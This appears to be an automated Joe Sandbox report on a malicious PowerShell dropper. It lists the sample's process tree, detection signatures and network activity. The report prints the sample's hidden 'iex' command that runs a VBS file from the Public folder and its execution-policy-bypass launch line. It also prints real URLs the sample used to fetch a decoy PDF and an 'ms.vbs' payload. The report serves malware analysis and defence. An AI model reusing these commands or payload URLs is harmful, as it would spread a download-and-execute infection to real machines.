Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1M1QoJF40r.ps1

Overview

General Information

Sample name:1M1QoJF40r.ps1
renamed because original name is a hash value
Original sample name:a63c8dacfe1337cf5d0654c19c97c35068cd6a257220ef56d3a51402e4f83862.ps1
Analysis ID:1578228
MD5:038e1ec475d16db5d36b71e12dbc5874
SHA1:a5b86b7e287cc13b3a6620eeac6ae6664949f68d
SHA256:a63c8dacfe1337cf5d0654c19c97c35068cd6a257220ef56d3a51402e4f83862
Tags:185-236-228-9287-120-112-91ps1www-al-rasikh-comuser-JAMESWT_MHT
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Loading BitLocker PowerShell Module
Powershell creates an autostart link
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 3924 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1M1QoJF40r.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4052 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\uipw9v.vbs'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • Acrobat.exe (PID: 6120 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 2248 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 2616 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1524,i,4216622319176972056,6080722429787729294,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • svchost.exe (PID: 5576 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 3924JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    Other

    SourceRuleDescriptionAuthorStrings
    amsi64_3924.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Suspicious PowerShell Parameter Substring
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\uipw9v.vbs'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\uipw9v.vbs'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1M1QoJF40r.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3924, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\uipw9v.vbs'", ProcessId: 4052, ProcessName: powershell.exe
      Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
      Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3924, TargetFilename: C:\Users\Public\zb6.vbs
      Sigma detected: Change PowerShell Policies to an Insecure Level
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1M1QoJF40r.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1M1QoJF40r.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1M1QoJF40r.ps1", ProcessId: 3924, ProcessName: powershell.exe
      Sigma detected: Potential Binary Or Script Dropper Via PowerShell
      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3924, TargetFilename: C:\Users\Public\zb6.vbs
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1M1QoJF40r.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1M1QoJF40r.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1M1QoJF40r.ps1", ProcessId: 3924, ProcessName: powershell.exe
      Sigma detected: Windows Processes Suspicious Parent Directory
      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5576, ProcessName: svchost.exe

      Suricata Signatures

      No Suricata rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: 1M1QoJF40r.ps1Avira: detected
      Multi AV Scanner detection for submitted file
      Source: 1M1QoJF40r.ps1Virustotal: Detection: 41%Perma Link
      Source: 1M1QoJF40r.ps1ReversingLabs: Detection: 34%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.6% probability
      Source: unknownHTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.6:49710 version: TLS 1.2
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2322019431.0000028B0F862000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2205292098.0000015040265000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.2422673623.0000028B29C02000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.2322019431.0000028B0F862000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2422673623.0000028B29C52000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbe source: powershell.exe, 00000000.00000002.2422673623.0000028B29C02000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.2326344878.0000028B11370000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: CallSite.Target.pdbon.resources source: powershell.exe, 00000000.00000002.2424666019.0000028B29CEA000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000000.00000002.2422673623.0000028B29C52000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32X source: powershell.exe, 00000003.00000002.2204234398.00000150401C7000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb source: powershell.exe, 00000000.00000002.2422673623.0000028B29C02000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdb source: powershell.exe, 00000000.00000002.2422673623.0000028B29C52000.00000004.00000020.00020000.00000000.sdmp
      Source: global trafficHTTP traffic detected: GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.astenterprises.com.pkConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /ms/ms.vbs HTTP/1.1Host: www.bluemaxxlaser.comConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 203.175.174.69 203.175.174.69
      Source: Joe Sandbox ViewIP Address: 107.161.23.150 107.161.23.150
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.astenterprises.com.pkConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /ms/ms.vbs HTTP/1.1Host: www.bluemaxxlaser.comConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: www.astenterprises.com.pk
      Source: global trafficDNS traffic detected: DNS query: www.bluemaxxlaser.com
      Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 11:48:03 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: powershell.exe, 00000000.00000002.2328899793.0000028B13485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://astenterprises.com.pk
      Source: svchost.exe, 00000007.00000002.3369454437.000002C55C612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
      Source: 77EC63BDA74BD0D0E0426DC8F80085060.6.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
      Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
      Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
      Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
      Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
      Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
      Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
      Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
      Source: edb.log.7.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
      Source: powershell.exe, 00000003.00000002.2178720470.0000015028C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
      Source: powershell.exe, 00000000.00000002.2415392969.0000028B21A0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2415392969.0000028B21B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2197506866.0000015037D5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000003.00000002.2178720470.0000015027F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000003.00000002.2178720470.0000015027F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 00000000.00000002.2328899793.0000028B119A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2178720470.0000015027CF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000003.00000002.2178720470.0000015027F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000003.00000002.2178720470.0000015027F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000000.00000002.2328899793.0000028B13485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.astenterprises.com.pk
      Source: powershell.exe, 00000000.00000002.2328899793.0000028B134BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2328899793.0000028B1351B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.bluemaxxlaser.com
      Source: powershell.exe, 00000000.00000002.2328899793.0000028B134BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.bluemaxxlaser.com/ms/ms.vbs
      Source: powershell.exe, 00000000.00000002.2328899793.0000028B11BD2000.00000004.00000800.00020000.00000000.sdmp, 1M1QoJF40r.ps1String found in binary or memory: http://www.blupw4maxxlaspw4r.com/ms/ms.vbs
      Source: powershell.exe, 00000000.00000002.2422487333.0000028B29AE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
      Source: 2D85F72862B55C4EADD9E66E06947F3D0.6.drString found in binary or memory: http://x1.i.lencr.org/
      Source: powershell.exe, 00000000.00000002.2328899793.0000028B119A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2178720470.0000015027CF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000003.00000002.2178720470.0000015027F18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2178720470.000001502931A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2178720470.00000150291FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: powershell.exe, 00000003.00000002.2178720470.000001502931A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
      Source: powershell.exe, 00000003.00000002.2197506866.0000015037D5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000003.00000002.2197506866.0000015037D5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000003.00000002.2197506866.0000015037D5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
      Source: svchost.exe, 00000007.00000003.2274805623.000002C55C430000.00000004.00000800.00020000.00000000.sdmp, edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
      Source: powershell.exe, 00000003.00000002.2178720470.0000015027F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000000.00000002.2328899793.0000028B125D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2178720470.000001502931A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2178720470.0000015028C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: powershell.exe, 00000000.00000002.2415392969.0000028B21A0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2415392969.0000028B21B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2197506866.0000015037D5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000000.00000002.2328899793.0000028B13153000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk
      Source: powershell.exe, 00000000.00000002.2328899793.0000028B13153000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk/ms/List
      Source: powershell.exe, 00000000.00000002.2328899793.0000028B13153000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf
      Source: powershell.exe, 00000000.00000002.2328899793.0000028B13153000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astpw4ntpw4rprispw4s.com.pk/ms/List%20of%20rpw4quirpw4d%20itpw4ms%20and%20spw4rvicpw4s.p
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
      Source: unknownHTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.6:49710 version: TLS 1.2
      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34893CFA0_2_00007FFD34893CFA
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34893EFA0_2_00007FFD34893EFA
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348962FB0_2_00007FFD348962FB
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348961510_2_00007FFD34896151
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348957FA0_2_00007FFD348957FA
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD348C5FDC3_2_00007FFD348C5FDC
      Source: classification engineClassification label: mal84.evad.winPS1@20/61@5/3
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Desktop\List of Required items and services.pdfJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3212:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ecthr1o2.hsk.ps1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\uipw9v.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: 1M1QoJF40r.ps1Virustotal: Detection: 41%
      Source: 1M1QoJF40r.ps1ReversingLabs: Detection: 34%
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1M1QoJF40r.ps1"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\uipw9v.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1524,i,4216622319176972056,6080722429787729294,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\uipw9v.vbs'"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"Jump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1524,i,4216622319176972056,6080722429787729294,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
